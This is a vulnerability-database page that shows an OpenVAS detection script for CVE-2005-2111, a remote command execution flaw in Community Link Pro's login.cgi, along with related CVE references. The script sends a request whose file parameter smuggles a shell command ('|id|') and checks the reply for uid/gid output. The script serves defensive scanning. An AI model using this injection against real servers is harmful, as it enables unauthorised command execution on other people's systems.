Lucene search

K

Community Link Pro webeditor login.cgi remote command execution

🗓️ 26 Mar 2006 00:00:00Reported by Copyright (C) 2005 David MaciejakType 
openvas
 openvas
🔗 plugins.openvas.org👁 102 Views

Community Link Pro webeditor login.cgi remote command executio

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Community Link Pro login.cgi file Parameter Arbitrary Command Execution
27 Jul 200500:00
nessus
Cvelist
CVE-2005-2111
1 Jul 200504:00
cvelist
OpenVAS
Community Link Pro webeditor login.cgi remote command execution
26 Mar 200600:00
openvas
CVE
CVE-2005-2111
5 Jul 200504:00
cve
NVD
CVE-2005-2111
5 Jul 200504:00
nvd
SourceLink
securityfocuswww.securityfocus.com/bid/14097
# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.19305");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/14097");
  script_cve_id("CVE-2005-2111");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("Community Link Pro webeditor login.cgi remote command execution");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 David Maciejak");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"The remote host is running Community Link Pro, a web-based application written
  in Perl.

  The remote version of this software contains a flaw in the script 'login.cgi'");

  script_tag(name:"impact", value:"The flaw may allow an attacker to execute arbitrary commands on the remote host.");

  script_tag(name:"solution", value:"Disable or remove this CGI.");

  script_tag(name:"solution_type", value:"Workaround");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

http_check_remote_code(
                        check_request:"/login.cgi?username=&command=simple&do=edit&password=&file=|id|",
                        check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                        command:"id",
                        extra_dirs:make_list("/app/webeditor")
                        );

exit( 99 );

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Mar 2006 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS27.5
EPSS0.01953
102
.json
Report